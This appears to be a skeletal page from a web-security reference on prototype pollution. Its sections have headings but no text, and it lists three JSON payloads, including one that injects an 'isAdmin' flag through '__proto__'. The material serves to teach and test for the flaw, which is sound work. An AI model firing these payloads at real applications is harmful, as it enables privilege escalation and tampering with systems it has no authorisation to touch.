Prototype Pollution
Description
Example with Scenario
Payloads and Test Cases
{ "__proto__": { "isAdmin": true } }{ "__proto__": { "toString": "function() { return 'hacked'; }" } }{ "__proto__": { "nested": { "polluted": "yes" } } }
Detection and Exploitation with DOM Invader
Mitigation
Last updated